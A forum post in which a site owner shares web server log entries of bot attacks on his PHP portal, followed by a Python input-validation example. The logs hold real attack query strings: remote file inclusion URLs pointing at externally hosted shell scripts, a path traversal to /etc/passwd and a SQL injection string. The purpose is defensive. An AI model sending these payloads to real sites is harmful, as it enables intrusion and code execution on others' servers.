I thought I'd publish some stats for people with websites about methods used by webbots to attack sites. On the front page it's a bespoke PHP portal, which secures every point of input and runs a lot of checks to make sure input is valid.
Anyway, if you're a web designer, here are some examples of basic attacks and why you have to secure any point of input. Validate and abort if the input isn't what's wanted... it's the least you can do for your users.
Code:
IP:
Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)
Remote Address: 65.83.197.216
Remote Port: 1440
---------
Query String: id=http://amyru.h18.ru/images/cs.txt?
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com
Code:
IP:
Agent: libwww-perl/5.79
Remote Address: 194.126.175.35
Remote Port: 56104
---------
Query String: act=lirenews&id=http://www.freewebs.com/nuklir/alat/f.php??
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com
Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Remote Address: 58.71.1.35
Remote Port: 46940
---------
Query String: section=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&id=481
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com
Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Remote Address: 222.197.173.53
Remote Port: 4214
---------
Query String: section=http%3A%2F%2Fwww.slda.info%2Fimages%2Flebun%2Fisexopo%2F&id=481
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com
Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
Remote Address: 86.106.16.178
Remote Port: 1903
---------
Query String: section=../../../../../../../../../../../../../../etc/passwd
X-Forwarded: none
Script Name: /modules/links/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com
Code:
IP:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Remote Address: 140.130.156.81
Remote Port: 2262
---------
Query String: section=movies&id=http%3A%2F%2Fwww.intel.com%3F&jYQAAtWq86=
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com
Code:
IP:
Agent: Internet Explorer 6.0
Remote Address: 219.137.204.103
Remote Port: 1156
---------
Query String: section=movies&id=481'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='
X-Forwarded: none
Script Name: /modules/shares/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com
Code:
IP:
Agent: libwww-perl/5.803
Remote Address: 81.171.105.6
Remote Port: 55601
---------
Query String: id=http://edl.yoll.net/cmd.txt?
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com
Code:
IP:
Agent: libwww-perl/5.79
Remote Address: 72.32.2.231
Remote Port: 59365
---------
Query String: id=http://www.jonat.com/work/psv?
X-Forwarded: none
Script Name: /modules/news/index.php
Request Method: GET
POST Data:
HTTP-HOST: www.dead-donkey.com
Just a short sample of recent attacks. I usually email the site admins of attack sites but found an overwhelming ignorance and hostility to the damage their site is doing. If you paste one of the odd URLs into your address bar, you'll usually find the method of attack, which is trying to get remote PHP to execute. Obviously the bots have attacked those sites and uploaded malicious code, so it's important that you do everything in your power to protect your site, not only for your site and your users, but also for every other site on the internet.
I'll post novel attacks in this thread from time to time.
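
An added example, not part of the original post or the site's own code: a "validate and abort" check run over query strings from the logs above, written in Python rather than the portal's PHP. The parameter formats in `ALLOWED` and the names `check`, `label` and `SIGNATURES` are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Assumed parameter formats (hypothetical; the post does not list the portal's rules).
ALLOWED = {
    "id": re.compile(r"\d{1,9}"),
    "section": re.compile(r"[a-z]{1,20}"),
    "act": re.compile(r"[a-z]{1,20}"),
}

# Heuristic labels for rejected values, for logging and statistics only.
SIGNATURES = [
    ("remote-include", re.compile(r"^\s*(?:https?|ftp)://", re.I)),
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("sql-injection", re.compile(r"['\";]|--")),
]

def label(value):
    """Name the first signature a rejected value matches."""
    for name, pattern in SIGNATURES:
        if pattern.search(value):
            return name
    return "malformed"

def check(query_string):
    """Return (parameter, label) per failing input; an empty list means proceed."""
    rejected = []
    # parse_qsl URL-decodes values, so %2F-encoded payloads are checked decoded.
    for name, value in parse_qsl(query_string, keep_blank_values=True):
        rule = ALLOWED.get(name)
        if rule is None:
            rejected.append((name, "unexpected-parameter"))
        elif not rule.fullmatch(value):
            rejected.append((name, label(value)))
    return rejected

SAMPLES = [
    "section=movies&id=481",  # constructed benign request
    # The remaining query strings are copied from the log entries in the post.
    "section=http%3A%2F%2Fwww.slda.info%2Fimages%2Flebun%2Fisexopo%2F&id=481",
    "section=../../../../../../../../../../../../../../etc/passwd",
    "section=movies&id=481'%20and%20char(124)%2Buser%2Bchar(124)=0%20and%20'%25'='",
    "section=movies&id=http%3A%2F%2Fwww.intel.com%3F&jYQAAtWq86=",
]

if __name__ == "__main__":
    for qs in SAMPLES:
        print(check(qs) or "ok", "<-", qs)
```

The decision to abort comes from the allowlist alone; the signature labels only describe what was rejected, so a payload that matches no signature is still refused as "malformed".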